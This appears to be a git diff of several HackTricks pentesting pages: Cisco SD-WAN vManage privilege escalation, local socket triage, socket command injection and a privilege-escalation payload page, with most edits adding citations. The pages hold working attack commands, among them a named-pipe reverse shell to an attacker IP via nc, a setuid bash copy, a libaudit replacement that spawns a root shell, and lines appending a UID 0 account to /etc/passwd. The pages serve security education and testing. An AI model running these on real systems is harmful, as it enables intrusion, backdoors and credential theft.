 strings /usr/bin/confd_cli | egrep 'cmdptywrapper|vshell|confd'
@@ -208,21 +206,21 @@ strace -f -s 200 -o /tmp/confd.trace /usr/bin/confd_cli
 ss -lntp | grep 4565
 ```
 
-This turns the 2025 bug into a good hunting pattern for similar versions: look for **local CLI shims that collect identity in userland and forward it to a more privileged wrapper**.
+This turns the 2025 bug into a reusable hunting pattern: look for **local CLI shims that collect identity in userland and forward it to a privileged wrapper**.<sup>[[6]](#references)[[7]](#references)</sup>
 
-Do not confuse **CVE-2025-20122** with the later **CVE-2026-20122**: the 2025 issue is a *local* CLI-to-root bug, while the 2026 issue is a *remote* API arbitrary file overwrite that is mostly useful for planting a foothold and then revisiting Path 1 / Path 2 / Path 4.
+Do not confuse **CVE-2025-20122** with the later **CVE-2026-20122**: the 2025 issue is a *local* CLI-to-root bug, while the 2026 issue is a *remote* API arbitrary file overwrite that is mostly useful for planting a foothold and then revisiting Path 1 / Path 2 / Path 4.<sup>[[3]](#references)[[7]](#references)</sup>
 
 ## Path 4 (2026 low-priv REST API to root - CVE-2026-20126)
 
-Cisco's February 2026 advisory also introduced another useful privesc class: [CVE-2026-20126](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v) allowed an **authenticated, local attacker with low privileges** to gain root because of an insufficient user-authentication mechanism in the REST API.<sup>[[1]](#references)</sup>
+Cisco's February 2026 advisory describes another useful privesc class, [CVE-2026-20126](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v). An **authenticated, local attacker with low privileges** could gain root because of an insufficient user-authentication mechanism in the REST API.<sup>[[1]](#references)</sup>
 
-This matters because vManage privesc is not limited to `confd`/TTY abuse anymore. After a low-priv shell, also hunt for:
+This matters because vManage privesc is not limited to `confd`/TTY abuse anymore; after a low-priv shell, also hunt for the following.<sup>[[1]](#references)</sup>
 
 - localhost-only API endpoints that trust the caller too much
 - tokens, cookies, or service credentials readable from the current account
 - root-only actions exposed through `dataservice`/REST handlers that can still be triggered locally
 
-In practice, once you have a shell as `vmanage` or another service user, local API abuse is often quieter and easier to automate than interactive CLI abuse:
+In practice, once you have a shell as `vmanage` or another service user, local API abuse can be easier to automate than interactive CLI abuse.<sup>[[1]](#references)</sup>
 
 ```bash
 env | grep -iE 'token|cookie|session'
@@ -230,26 +228,26 @@ grep -R "dataservice" /etc /opt 2>/dev/null | head
 ss -lntp | grep -E '(:443|:8443)'
 ```
 
-If the local session context is enough to hit privileged REST functionality, prefer the API path: it is easier to replay, script, and chain with stolen web sessions or API tokens.
+If the local session context is enough to hit privileged REST functionality, prefer the API path: it is easier to replay, script, and chain with stolen web sessions or API tokens.<sup>[[1]](#references)</sup>
 
 ## Path 5 (2026 crafted file processed by root - CVE-2026-20245)
 
-Another recent pattern is [CVE-2026-20245](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx): a local attacker with `netadmin` privileges could upload a **crafted file** that the CLI later handled unsafely, leading to command injection as `root`.<sup>[[2]](#references)</sup>
+Another recent pattern is [CVE-2026-20245](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx). A local attacker with `netadmin` privileges could upload a **crafted file** that the CLI later handled unsafely, leading to command injection as `root`.<sup>[[2]](#references)</sup>
 
-From a HackTricks point of view, the valuable technique is broader than the specific CVE:
+From a HackTricks point of view, the valuable technique is broader than the specific CVE.<sup>[[2]](#references)</sup>
 
 1. Enumerate every CLI or web workflow that accepts a file: imports, diagnostic bundles, templates, validators, backups, tenant data, etc.
 2. Trace where the uploaded file lands and which root-owned script or binary consumes it.
 3. Test whether the filename, file content, or parsed metadata is ever passed to shell commands, wrapper scripts, or `system()`-style helpers.
 4. If you can already reach `netadmin` (valid creds, stolen session, or an auth-bypass chain), file-processing bugs are often the fastest path to root.
 
-Google Cloud / Mandiant later showed a very concrete instance of this bug class being exploited through the multitenancy import path:<sup>[[4]](#references)</sup>
+Google Cloud / Mandiant later showed a concrete instance of this bug class being exploited through the multitenancy import path.<sup>[[4]](#references)</sup>
 
 ```bash
 request tenant-upload tenant-list /home/admin/evil_tenant.csv vpn 0
 ```
 
-In the observed attack, the crafted CSV ended up modifying `/etc/passwd` and `/etc/shadow` to create a temporary UID 0 account (`troot`).<sup>[[4]](#references)</sup> That makes `tenant-upload` / `tenant-list` style importers especially interesting: they are not just data-ingestion features, but potential root-owned parser front-ends.
+In the observed attack, the crafted CSV modified `/etc/passwd` and `/etc/shadow` to create a temporary UID 0 account (`troot`). That makes `tenant-upload` / `tenant-list` style importers especially interesting: they are not just data-ingestion features, but potential root-owned parser front-ends.<sup>[[4]](#references)</sup>
 
 A quick shell-side hunting pattern is:
 
@@ -258,17 +256,17 @@ strings /usr/bin/* 2>/dev/null | grep -E 'tenant-upload|tenant-list|import|uploa
 grep -R "tenant-upload\|tenant-list" /opt /usr 2>/dev/null | head
 ```
 
-This bug class chains especially well with remote footholds that grant `netadmin` but not `root`.
+This bug class chains especially well with remote footholds that grant `netadmin` but not `root`.<sup>[[2]](#references)[[4]](#references)</sup>
 
 ## Other recent vManage/Catalyst SD-WAN Manager vulns to chain
 
 - **Unauthenticated info leak (CVE-2026-20133)** – Especially high-value because public research showed it could expose `confd_ipc_secret` or the `vmanage-admin` private key, turning a read bug into either Path 1 or a NETCONF pivot.<sup>[[3]](#references)</sup>
 - **Authenticated API arbitrary file overwrite (CVE-2026-20122)** – Different from the 2025 CLI bug above; VulnCheck used it to upload a webshell, which then makes the local privesc paths on this page immediately relevant.<sup>[[3]](#references)</sup>
-- **Authenticated UI XSS (CVE-2024-20475)** – Steal an admin session in the web UI, then pivot into API/CLI actions that eventually reach `vshell` or one of the local privesc paths above.
-- **Remote auth bypass to `netadmin` (CVE-2026-20129)** – Very strong precursor for Path 5 because `netadmin` is exactly the level required by the 2026 crafted-file privesc.<sup>[[3]](#references)</sup>
-- **Authenticated arbitrary file write (CVE-2026-20262)** – Similar offensive value to CVE-2026-20122 but through a later web UI upload path: write into a location that will later be parsed by root or by the management-plane web tier.
+- **Authenticated UI XSS (CVE-2024-20475)** – An authenticated attacker can execute script in an affected user's web interface; assess whether the resulting session context exposes API/CLI actions that reach `vshell` or one of the local privesc paths above.<sup>[[9]](#references)</sup>
+- **Remote auth bypass to `netadmin` (CVE-2026-20129)** – Very strong precursor for Path 5 because `netadmin` is exactly the level required by the 2026 crafted-file privesc.<sup>[[2]](#references)[[3]](#references)</sup>
+- **Authenticated arbitrary file write (CVE-2026-20262)** – Similar offensive value to CVE-2026-20122, but through a later web UI upload path; Cisco says a file created or overwritten by the bug could later be used to elevate to root.<sup>[[10]](#references)</sup>
 - **Downgrade to resurrect old CLI privesc (CVE-2022-20775)** – 2026 intrusions showed attackers can roll back to an older vulnerable SD-WAN build, abuse the old CLI root bug, and then restore the original version.<sup>[[8]](#references)</sup>
-- **Pre-auth control-plane auth bypass (CVE-2026-20182)** – Better documented in the dedicated SD-WAN control-plane page; it can append an SSH key for `vmanage-admin`, giving you the local foothold needed to revisit this page.
+- **Pre-auth control-plane auth bypass (CVE-2026-20182)** – Better documented in the dedicated SD-WAN control-plane page; it can append an SSH key for `vmanage-admin`, providing persistent NETCONF access for follow-on management-plane actions.<sup>[[11]](#references)</sup>
 
 
 
@@ -282,5 +280,8 @@ This bug class chains especially well with remote footholds that grant `netadmin
 - [6] [Hacking Cisco SD-WAN vManage 19.2.2 — From CSRF to Remote Code Execution](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77)
 - [7] [Cisco Catalyst SD-WAN Manager Privilege Escalation Vulnerability (CVE-2025-20122)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-priviesc-WCk7bmmt)
 - [8] [Active exploitation of Cisco Catalyst SD-WAN by UAT-8616 (Cisco Talos)](https://blog.talosintelligence.com/uat-8616-sd-wan/)
+- [9] [Cisco Catalyst SD-WAN Manager Cross-Site Scripting Vulnerability (CVE-2024-20475)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-xss-zQ4KPvYd)
+- [10] [Cisco Catalyst SD-WAN Manager Arbitrary File Write Vulnerability (CVE-2026-20262)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-arbfw-c2rZvQ)
+- [11] [Rapid7: CVE-2026-20182 - Critical authentication bypass in Cisco Catalyst SD-WAN Controller](https://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/network-information/local-network-and-socket-triage.md
+++ b/src/linux-hardening/network-information/local-network-and-socket-triage.md
@@ -1,14 +1,12 @@
 # Local Network and Socket Triage
 
-{{#include ../../banners/hacktricks-training.md}}
-
 After getting a shell on a Linux host, the most useful network targets are often not exposed externally. Loopback-only services, veth networks, Unix sockets, temporary listeners, packet captures, and local firewall rules can expose credentials or local-only attack surfaces.
 
 This page focuses on practical local post-exploitation techniques, not general remote network pentesting.
 
 ## Loopback and Local Service Enumeration
 
-Start by identifying listening services, their bind addresses, and the owning process when permissions allow it:
+Start by identifying listening services, their bind addresses, and the owning process when permissions allow it.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 ss -lntup
@@ -19,12 +17,12 @@ ip route
 
 Important patterns:
 
-- `127.0.0.1:<port>` or `[::1]:<port>`: reachable only from the host by default.
-- `0.0.0.0:<port>`: reachable on all IPv4 interfaces unless filtered.
-- `172.x`, `10.x`, or `192.168.x` on `veth*`, `docker*`, `br-*`, `cni*`: likely container or local lab networks.
-- Unix sockets under `/run`, `/var/run`, `/tmp`, or application directories: local IPC surfaces.
+- `127.0.0.1:<port>` or `[::1]:<port>`: reachable only from the host by default.<sup>[[3]](#references)[[4]](#references)</sup>
+- `0.0.0.0:<port>`: reachable on all IPv4 interfaces unless filtered.<sup>[[3]](#references)</sup>
+- `10.0.0.0/8`, `172.16.0.0/12`, or `192.168.0.0/16` on `veth*`, `docker*`, `br-*`, `cni*`: likely container or local lab networks.<sup>[[23]](#references)[[24]](#references)</sup>
+- Unix sockets under `/run`, `/var/run`, `/tmp`, or application directories: local IPC surfaces.<sup>[[5]](#references)</sup>
 
-Map local ports with lightweight probes:
+Map local ports with lightweight probes.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 for p in 80 443 8000 8080 8081 9000 5000; do
@@ -32,7 +30,7 @@ for p in 80 443 8000 8080 8081 9000 5000; do
 done
 ```
 
-Use `nmap` locally when available:
+Use `nmap` locally when available.<sup>[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 nmap -sT -Pn -p- 127.0.0.1
@@ -41,7 +39,7 @@ nmap -sT -Pn --open 127.0.0.1
 
 ## Hidden veth and Container Subnets
 
-Containerized or lab environments often expose services only on a bridge or veth subnet. Enumerate interfaces and routes before assuming a service is unreachable:
+Containerized or lab environments often expose services only on a bridge or veth subnet. Enumerate interfaces and routes before assuming a service is unreachable.<sup>[[2]](#references)</sup>
 
 ```bash
 ip -br addr
@@ -49,13 +47,13 @@ ip route
 ip neigh
 ```
 
-Find likely local subnets:
+Find likely local subnets.<sup>[[2]](#references)</sup>
 
 ```bash
 ip -o -4 addr show | awk '{print $2, $4}'
 ```
 
-Probe a discovered subnet carefully:
+Probe a discovered subnet carefully.<sup>[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 nmap -sT -Pn --open 172.17.0.0/24
@@ -68,19 +66,19 @@ The technique is useful when a web panel, debug endpoint, or helper service is h
 
 If a service is bound to loopback, expose it through an allowed channel instead of changing the service itself.
 
-Forward a local-only HTTP service with SSH:
+Forward a local-only HTTP service with SSH.<sup>[[11]](#references)</sup>
 
 ```bash
 ssh -L 8080:127.0.0.1:8080 user@target
 ```
 
-Bridge a local port with `socat` when you already have shell access:
+Bridge a local port with `socat` when you already have shell access.<sup>[[12]](#references)</sup>
 
 ```bash
 socat TCP-LISTEN:18080,fork,reuseaddr TCP:127.0.0.1:8080
 ```
 
-Forward a Unix socket to TCP for local testing:
+Forward a Unix socket to TCP for local testing.<sup>[[5]](#references)[[12]](#references)</sup>
 
 ```bash
 socat TCP-LISTEN:18081,fork,reuseaddr UNIX-CONNECT:/run/app/app.sock
@@ -92,7 +90,7 @@ This does not exploit anything by itself. It makes a local-only surface reachabl
 
 Not every service is HTTP. Many local services leak enough information through a banner or one-line protocol.
 
-Basic probes:
+Basic probes.<sup>[[13]](#references)</sup>
 
 ```bash
 nc -nv 127.0.0.1 9000
@@ -100,14 +98,14 @@ printf 'help\n' | nc -nv 127.0.0.1 9000
 printf 'version\n' | nc -nv 127.0.0.1 9000
 ```
 
-HTTP check without a browser:
+HTTP check without a browser.<sup>[[13]](#references)[[14]](#references)</sup>
 
 ```bash
 printf 'GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n' | nc -nv 127.0.0.1 8080
 curl -i http://127.0.0.1:8080/
 ```
 
-For TLS:
+For TLS.<sup>[[14]](#references)[[15]](#references)</sup>
 
 ```bash
 openssl s_client -connect 127.0.0.1:8443 -servername localhost
@@ -118,21 +116,21 @@ The goal is to identify the protocol, authentication scheme, version, and whethe
 
 ## Capturing Loopback Traffic
 
-Local traffic can expose headers, bearer tokens, Basic Auth credentials, or application-specific secrets. Capture only in authorized environments.
+Local traffic can expose headers, bearer tokens, Basic Auth credentials, or application-specific secrets.<sup>[[17]](#references)[[25]](#references)</sup> Capture only in authorized environments.
 
-Capture loopback HTTP traffic:
+Capture loopback HTTP traffic.<sup>[[16]](#references)</sup>
 
 ```bash
 sudo tcpdump -i lo -A -s0 'tcp port 80 or tcp port 8080'
 ```
 
-Capture a specific local service:
+Capture a specific local service.<sup>[[16]](#references)</sup>
 
 ```bash
 sudo tcpdump -i lo -w /tmp/loopback.pcap 'tcp port 8080'
 ```
 
-Decode Basic Auth from a captured or logged header:
+Decode Basic Auth from a captured or logged header.<sup>[[17]](#references)[[18]](#references)</sup>
 
 ```bash
 printf '%s' 'dXNlcjpwYXNz' | base64 -d
@@ -146,9 +144,9 @@ grep -Ei 'Authorization:|Cookie:|Bearer|Basic|token|api[_-]?key|password' /tmp/c
 
 ## TLS Key Logging
 
-If you can control the client process environment in a lab, `SSLKEYLOGFILE` can make TLS sessions decryptable in Wireshark or compatible tooling. This is useful for understanding local HTTPS traffic without attacking TLS itself.
+If you can control the client process environment in a lab, `SSLKEYLOGFILE` can make TLS sessions decryptable in Wireshark or compatible tooling.<sup>[[19]](#references)[[20]](#references)</sup> This is useful for understanding local HTTPS traffic without attacking TLS itself.
 
-Run a client with key logging enabled:
+Run a client with key logging enabled.<sup>[[19]](#references)[[20]](#references)</sup>
 
 ```bash
 export SSLKEYLOGFILE=/tmp/sslkeys.log
@@ -156,46 +154,46 @@ curl -k https://127.0.0.1:8443/
 ls -l /tmp/sslkeys.log
 ```
 
-Capture the traffic at the same time:
+Capture the traffic at the same time.<sup>[[16]](#references)</sup>
 
 ```bash
 sudo tcpdump -i lo -w /tmp/tls.pcap 'tcp port 8443'
 ```
 
-Then load `/tmp/tls.pcap` and `/tmp/sslkeys.log` into Wireshark. This only works when the client library supports NSS-style key logging and you can set the environment before the connection is made.
+Then load `/tmp/tls.pcap` and `/tmp/sslkeys.log` into Wireshark. This only works when the client library supports NSS-style key logging and you can set the environment before the connection is made.<sup>[[20]](#references)[[21]](#references)</sup>
 
 ## Unix Socket Interaction and Command Injection
 
-Unix sockets are local IPC endpoints. They may expose HTTP APIs, custom protocols, or unsafe command handlers.
+Unix sockets are local IPC endpoints.<sup>[[5]](#references)</sup> They may expose HTTP APIs, custom protocols, or unsafe command handlers.<sup>[[12]](#references)[[14]](#references)</sup>
 
-Find sockets:
+Find sockets.<sup>[[1]](#references)[[5]](#references)</sup>
 
 ```bash
 ss -lnx
 find /run /var/run /tmp -type s -ls 2>/dev/null
 ```
 
-Interact with HTTP over a Unix socket:
+Interact with HTTP over a Unix socket.<sup>[[14]](#references)</sup>
 
 ```bash
 curl --unix-socket /run/app/app.sock http://localhost/
 curl --unix-socket /run/app/app.sock -i http://localhost/admin
 ```
 
-Interact with a raw socket:
+Interact with a raw socket.<sup>[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 printf 'status\n' | socat - UNIX-CONNECT:/run/app/app.sock
 printf 'help\n' | nc -U /run/app/app.sock
 ```
 
-If user-controlled socket input is passed to a shell or privileged helper, it can become command injection. For a focused example, see [Socket Command Injection](socket-command-injection.md).
+If user-controlled socket input is passed to a shell or privileged helper, it can become command injection.<sup>[[26]](#references)</sup> For a focused example, see [Socket Command Injection](socket-command-injection.md).
 
 ## nftables Review and Authorized Rule Changes
 
-Local firewall rules may explain why a service is visible locally but blocked remotely, or why a high port appears unreachable from one interface.
+Local firewall rules may explain why a service is visible locally but blocked remotely, or why a high port appears unreachable from one interface.<sup>[[22]](#references)</sup>
 
-Review rules:
+Review rules.<sup>[[22]](#references)</sup>
 
 ```bash
 sudo nft list ruleset
@@ -203,20 +201,20 @@ sudo nft list tables
 sudo nft list chains
 ```
 
-Look for drops affecting a target port:
+Look for drops affecting a target port.<sup>[[22]](#references)</sup>
 
 ```bash
 sudo nft list ruleset | grep -Ei 'drop|reject|dport|tcp|udp'
 ```
 
-In an authorized lab, remove a specific blocking rule by handle:
+In an authorized lab, remove a specific blocking rule by handle.<sup>[[22]](#references)</sup>
 
 ```bash
 sudo nft -a list chain inet filter input
 sudo nft delete rule inet filter input handle <handle>
 ```
 
-Prefer deleting the exact handle over flushing full tables. The technique is to identify the precise filter causing the behavior and change only that rule.
+Prefer deleting the exact handle over flushing full tables. The technique is to identify the precise filter causing the behavior and change only that rule.<sup>[[22]](#references)</sup>
 
 ## Quick Workflow
 
@@ -231,5 +229,34 @@ sudo nft list ruleset 2>/dev/null | head -n 80
 ```
 
 Prioritize services that are local-only, run as a more privileged user, expose admin/debug functions, or trust loopback/container-network clients.
+
+## References
+
+- [1] [ss(8) — Linux manual page](https://man7.org/linux/man-pages/man8/ss.8.html)
+- [2] [ip(8) — Linux manual page](https://man7.org/linux/man-pages/man8/ip.8.html)
+- [3] [ip(7) — Linux manual page](https://man7.org/linux/man-pages/man7/ip.7.html)
+- [4] [RFC 4291: IP Version 6 Addressing Architecture](https://www.rfc-editor.org/info/rfc4291/)
+- [5] [unix(7) — Linux manual page](https://man7.org/linux/man-pages/man7/unix.7.html)
+- [6] [Redirections (Bash Reference Manual)](https://www.gnu.org/s/bash/manual/html_node/Redirections.html)
+- [7] [timeout invocation (GNU Coreutils)](https://www.gnu.org/s/coreutils/timeout)
+- [8] [Port Scanning Techniques (Nmap Reference Guide)](https://nmap.org/book/man-port-scanning-techniques.html)
+- [9] [Host Discovery (Nmap Reference Guide)](https://nmap.org/book/man-host-discovery.html)
+- [10] [Port Specification and Scan Order (Nmap Reference Guide)](https://nmap.org/book/man-port-specification.html)
+- [11] [ssh(1) — Linux manual page](https://man7.org/linux/man-pages/man1/ssh.1.html)
+- [12] [socat(1) — Linux manual page](https://www.man7.org/linux/man-pages/man1/socat.1.html)
+- [13] [nc(1) — OpenBSD manual page](https://man.openbsd.org/nc.1)
+- [14] [curl command line tool manual](https://curl.se/docs/manpage.html?category=23)
+- [15] [openssl-s_client — OpenSSL Documentation](https://docs.openssl.org/3.0/man1/openssl-s_client/)
+- [16] [tcpdump(8) — Linux manual page](https://man7.org/linux/man-pages/man8/tcpdump.8.html)
+- [17] [RFC 7617: The 'Basic' HTTP Authentication Scheme](https://www.rfc-editor.org/rfc/rfc7617.html)
+- [18] [base64 invocation (GNU Coreutils)](https://www.gnu.org/software/coreutils/manual/html_node/base64-invocation.html)
+- [19] [openssl-env — OpenSSL Documentation](https://docs.openssl.org/master/man7/openssl-env/)
+- [20] [TLS — Wireshark Wiki](https://wiki.wireshark.org/tls)
+- [21] [Wireshark User’s Guide](https://www.wireshark.org/docs/wsug_html/)
+- [22] [nftables manual](https://netfilter.org/projects/nftables/manpage.html)
+- [23] [Address Allocation for Private Internets (RFC 1918)](https://www.rfc-editor.org/rfc/rfc1918.html)
+- [24] [ip-link(8) — Linux manual page](https://man7.org/linux/man-pages/man8/ip-link.8.html)
+- [25] [The OAuth 2.0 Authorization Framework: Bearer Token Usage (RFC 6750)](https://www.rfc-editor.org/rfc/rfc6750.html)
+- [26] [CWE-78: Improper Neutralization of Special Elements used in an OS Command](https://cwe.mitre.org/data/definitions/78.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/network-information/socket-command-injection.md
+++ b/src/linux-hardening/network-information/socket-command-injection.md
@@ -1,7 +1,5 @@
 # Socket Command Injection
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Socket binding example with Python
 
 In the following example a **unix socket is created** (`/tmp/socket_test.s`) and everything **received** is going to be **executed** by `os.system`.I know that you aren't going to find this in the wild, but the goal of this example is to see how a code using unix sockets looks like, and how to manage the input in the worst case possible.
@@ -45,7 +43,9 @@ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat -
 
 ## Case study: Root-owned UNIX socket signal-triggered escalation (LG webOS)
 
-Some privileged daemons expose a root-owned UNIX socket that accepts untrusted input and couples privileged actions to thread-IDs and signals. If the protocol lets an unprivileged client influence which native thread is targeted, you may be able to trigger a privileged code path and escalate.<sup>[[1]](#references)</sup>
+Some privileged daemons expose a root-owned UNIX socket that accepts untrusted input and couples privileged actions to thread-IDs and signals. If the protocol lets an unprivileged client influence which native thread is targeted, you may be able to trigger a privileged code path and escalate.<sup>[[1]](#references)[[2]](#references)</sup>
+
+The primary write-up and disclosure describe the following sequence.<sup>[[1]](#references)[[2]](#references)</sup>
 
 Observed pattern:
 - Connect to a root-owned socket (e.g., /tmp/remotelogger).
@@ -53,13 +53,14 @@ Observed pattern:
 - Send the TID (packed) plus padding as a request; receive an acknowledgement.
 - Deliver a specific signal to that TID to trigger the privileged behaviour.
 
+The condensed PoC below mirrors that sequence.<sup>[[1]](#references)[[2]](#references)</sup>
 Minimal PoC sketch:
 
 ```python
 import socket, struct, os, threading, time
 # Spawn a thread so we have a TID we can signal
 th = threading.Thread(target=time.sleep, args=(600,)); th.start()
- tid = th.native_id  # Python >=3.8
+tid = th.native_id  # Python >=3.8
 s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
 s.connect("/tmp/remotelogger")
 s.sendall(struct.pack('<L', tid) + b'A'*0x80)
@@ -67,7 +68,7 @@ s.recv(4)  # sync
 os.kill(tid, 4)  # deliver SIGILL (example from the case)
 ```
 
-To turn this into a root shell, a simple named-pipe + nc pattern can be used:
+To turn this into a root shell, a simple named-pipe + nc pattern can be used.<sup>[[2]](#references)</sup>
 
 ```bash
 rm -f /tmp/f; mkfifo /tmp/f
@@ -75,11 +76,12 @@ cat /tmp/f | /bin/sh -i 2>&1 | nc <ATTACKER-IP> 23231 > /tmp/f
 ```
 
 Notes:
-- This class of bugs arises from trusting values derived from unprivileged client state (TIDs) and binding them to privileged signal handlers or logic.
+- This class of bugs arises from trusting values derived from unprivileged client state (TIDs) and binding them to privileged signal handlers or logic.<sup>[[1]](#references)</sup>
 - Harden by enforcing credentials on the socket, validating message formats, and decoupling privileged operations from externally supplied thread identifiers.
 
 ## References
 
-- [1] [LG WebOS TV Path Traversal, Authentication Bypass and Full Device Takeover (SSD Disclosure)](https://ssd-disclosure.com/lg-webos-tv-path-traversal-authentication-bypass-and-full-device-takeover/)
+- [1] [Jailbreak webOS for fun (just for fun)](https://ut.buglloc.com/2025/01/webos-jailbreak/)
+- [2] [LG WebOS TV Path Traversal, Authentication Bypass and Full Device Takeover (SSD Disclosure)](https://ssd-disclosure.com/lg-webos-tv-path-traversal-authentication-bypass-and-full-device-takeover/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/processes-crontab-systemd-dbus/d-bus-enumeration-and-command-injection-privilege-escalation.md
+++ b/src/linux-hardening/processes-crontab-systemd-dbus/d-bus-enumeration-and-command-injection-privilege-escalation.md
@@ -1,7 +1,5 @@
 # D-Bus Enumeration & Command Injection Privilege Escalation
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## **GUI enumeration**
 
 D-Bus is utilized as the inter-process communications (IPC) mediator in Ubuntu desktop environments. On Ubuntu, the concurrent operation of several message buses is observed: the system bus, primarily utilized by **privileged services to expose services relevant across the system**, and a session bus for each logged-in user, exposing services relevant only to that specific user. The focus here is primarily on the system bus due to its association with services running at higher privileges (e.g., root) as our objective is to elevate privileges. It is noted that D-Bus's architecture employs a 'router' per session bus, which is responsible for redirecting client messages to the appropriate services based on the address specified by the clients for the service they wish to communicate with.<sup>[[1]](#references)</sup>

--- a/src/linux-hardening/processes-crontab-systemd-dbus/payloads-to-execute.md
+++ b/src/linux-hardening/processes-crontab-systemd-dbus/payloads-to-execute.md
@@ -1,8 +1,8 @@
 # Payloads to execute
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Bash
+
+`bash -p` enables privileged mode: when Bash starts with different real and effective IDs, it does not reset the effective ID to the real ID. The resulting shell still depends on the caller's existing credentials.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 cp /bin/bash /tmp/b && chmod +s /tmp/b
@@ -10,6 +10,8 @@ cp /bin/bash /tmp/b && chmod +s /tmp/b
 ```
 
 ## C
+
+`setresuid` changes the real, effective, and saved IDs when permitted, while `setuid` changes the effective ID and may also set the real and saved IDs for a privileged caller. `execve` replaces the current process image with the requested program.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup> These examples omit return-value checks; both credential calls can fail even for UID 0.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```c
 //gcc payload.c -o payload
@@ -52,6 +54,8 @@ int main(void) {
 
 ### Common files
 
+These are common local privilege-control files and interfaces: `/etc/passwd` stores seven-field account records, `/etc/shadow` stores optional encrypted password data, `sudoers` defines sudo privileges and tags such as `NOPASSWD`, and Docker's default daemon endpoint is a Unix socket at `/var/run/docker.sock`; access to that socket can grant root-level control of its host.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
+
 - Add user with password to _/etc/passwd_
 - Change password inside _/etc/shadow_
 - Add user to sudoers in _/etc/sudoers_
@@ -59,7 +63,7 @@ int main(void) {
 
 ### Overwriting a library
 
-Check a library used by some binary, in this case `/bin/su`:
+Check which shared libraries a binary uses; in this example, inspect `/bin/su` with `ldd`.<sup>[[9]](#references)</sup>
 
 ```bash
 ldd /bin/su
@@ -73,8 +77,9 @@ ldd /bin/su
         /lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
 ```
 
-In this case lets try to impersonate `/lib/x86_64-linux-gnu/libaudit.so.1`.\
-So, check for functions of this library used by the **`su`** binary:
+`ldd` reports shared-object dependencies, while the dynamic linker uses ELF metadata and its search rules to load them at runtime.<sup>[[9]](#references)[[10]](#references)</sup>
+
+To inspect one candidate, use `objdump -T` to print the dynamic symbol table of `su` and filter for audit names.<sup>[[11]](#references)</sup>
 
 ```bash
 objdump -T /bin/su | grep audit
@@ -84,7 +89,9 @@ objdump -T /bin/su | grep audit
 000000000020e968 g    DO .bss   0000000000000004  Base        audit_fd
 ```
 
-The symbols `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` and `audit_fd` are probably from the libaudit.so.1 library. As the libaudit.so.1 will be overwritten by the malicious shared library, these symbols should be present in the new shared library, otherwise the program will not be able to find the symbol and will exit.
+`audit_open`, `audit_log_user_message`, and `audit_log_acct_message` are libaudit functions; `audit_fd` is shown as a data object defined in `su`'s `.bss` in this output.<sup>[[12]](#references)[[13]](#references)[[14]](#references)</sup> A replacement library must export compatible definitions for the undefined symbols that the loader resolves; mismatched function/data ABIs can still make the process fail when those symbols are relocated or called.<sup>[[10]](#references)[[11]](#references)</sup>
+
+GCC's `constructor` attribute causes `inject` to be called automatically before `main` on supported targets.<sup>[[15]](#references)</sup>
 
 ```c
 #include<stdio.h>
@@ -108,11 +115,13 @@ void inject()
 }
 ```
 
-Now, just calling **`/bin/su`** you will obtain a shell as root.
+If the replacement is loaded successfully by a privileged **`/bin/su`** process, this constructor can start **`/bin/bash`** with that process's privileges; the exact result is environment-dependent.<sup>[[10]](#references)[[15]](#references)</sup>
 
 ## Scripts
 
 Can you make root execute something?
+
+`sudoers` uses the `NOPASSWD` tag in policy entries, `chpasswd` reads `user:password` pairs from standard input, and `/etc/passwd` uses seven colon-separated account fields; the following examples assume the relevant files are writable by the process that runs them.<sup>[[5]](#references)[[6]](#references)[[16]](#references)</sup>
 
 ### **www-data to sudoers**
 
@@ -128,8 +137,31 @@ echo "root:hacked" | chpasswd
 
 ### Add new root user to /etc/passwd
 
+The final payload depends on a target that accepts the generated `crypt` hash: Debian's `mkpasswd -m sha-512` maps to SHA-512 crypt (`$6$`), while OpenSSL's `passwd -1 -salt` uses the MD5-based BSD algorithm (`$1$`).<sup>[[17]](#references)[[18]](#references)</sup>
+
 ```bash
 echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
 ```
+
+## References
+
+- [1] [The Set Builtin (Bash Reference Manual)](https://www.gnu.org/s/bash/manual/html_node/The-Set-Builtin.html)
+- [2] [setresuid(2) — Linux manual page](https://man7.org/linux/man-pages/man2/setresuid.2.html)
